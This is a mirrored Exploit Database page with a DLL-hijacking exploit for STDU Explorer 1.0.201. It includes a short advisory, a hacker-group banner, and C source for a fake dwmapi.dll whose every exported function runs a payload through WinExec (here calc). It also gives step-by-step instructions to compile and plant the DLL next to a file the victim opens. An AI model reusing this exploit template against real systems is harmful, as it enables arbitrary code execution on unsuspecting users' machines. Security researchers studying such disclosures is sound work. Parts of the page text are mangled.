STDU Explorer 1.0.201 – ‘dwmapi.dll’ DLL Loading Arbitrary Code Execution

• Exploit Database
• 114 阅读

• 作者： anT!-Tr0J4n
  日期： 2010-10-15
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34844/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86

  // source: https://www.securityfocus.com/bid/44128/info   STDU Explorer is prone to a vulnerability that lets attackers execute arbitrary code.   An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.   STDU Explorer 1.0.201 is vulnerable; other versions may also be affected.   =================================================== STDU explorer DLL Hijacking Exploit (dwmapi.dll) =================================================== -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /&apos; \__/&apos;__<code>\/\ \__/&apos;__</code>\ 0 0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1 1\/_/\ \ /&apos; _ <code>\ \/\ \/_/_\_<_/&apos;___\ \ \/\ \ \ \ \/</code>&apos;__\0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1 1\ \____/ >> Exploit database separated by exploit 0 0 \/___/type (local, remote, DoS, etc.)1 11 0[+] Site: Inj3ct0r.com0 1[+] Support e-mail: submit[at]inj3ct0r.com1 00 1 #########################################1 0 I&apos;m anT!-Tr0J4n member from Inj3ct0r Team1 1 #########################################0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1   /* #stdu explorer DLL Hijacking Exploit (dwmapi.dll)   #Author :anT!-Tr0J4n   #Greetz :Dev-PoinT.com ~ inj3ct0r.com~ All Dev-poinT members and my friends   #Email :D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com   #Software:http://www.stdutility.com/stduexplorer.html   #Tested on: Windows XP sp3   # Home:www.Dev-PoinT.com &http://inj3ct0r.com   ===================== HowTO use : Compile and rename to " dwmapi.dll " , create a file in the same dir with one of the following extensions.   check the result > Hack3d   =====================     #dwmapi.dll (code) */ #include <windows.h> #define DLLIMPORT __declspec (dllexport)   DLLIMPORT voidDwmDefWindowProc() { evil(); } DLLIMPORT voidDwmEnableBlurBehindWindow() { evil(); } DLLIMPORT voidDwmEnableComposition() { evil(); } DLLIMPORT voidDwmEnableMMCSS() { evil(); } DLLIMPORT voidDwmExtendFrameIntoClientArea() { evil(); } DLLIMPORT voidDwmGetColorizationColor() { evil(); } DLLIMPORT voidDwmGetCompositionTimingInfo() { evil(); } DLLIMPORT voidDwmGetWindowAttribute() { evil(); } DLLIMPORT voidDwmIsCompositionEnabled() { evil(); } DLLIMPORT voidDwmModifyPreviousDxFrameDuration() { evil(); } DLLIMPORT voidDwmQueryThumbnailSourceSize() { evil(); } DLLIMPORT voidDwmRegisterThumbnail() { evil(); } DLLIMPORT voidDwmSetDxFrameDuration() { evil(); } DLLIMPORT voidDwmSetPresentParameters() { evil(); } DLLIMPORT voidDwmSetWindowAttribute() { evil(); } DLLIMPORT voidDwmUnregisterThumbnail() { evil(); } DLLIMPORT voidDwmUpdateThumbnailProperties() { evil(); }   int evil() { WinExec("calc", 0); exit(0); return 0; }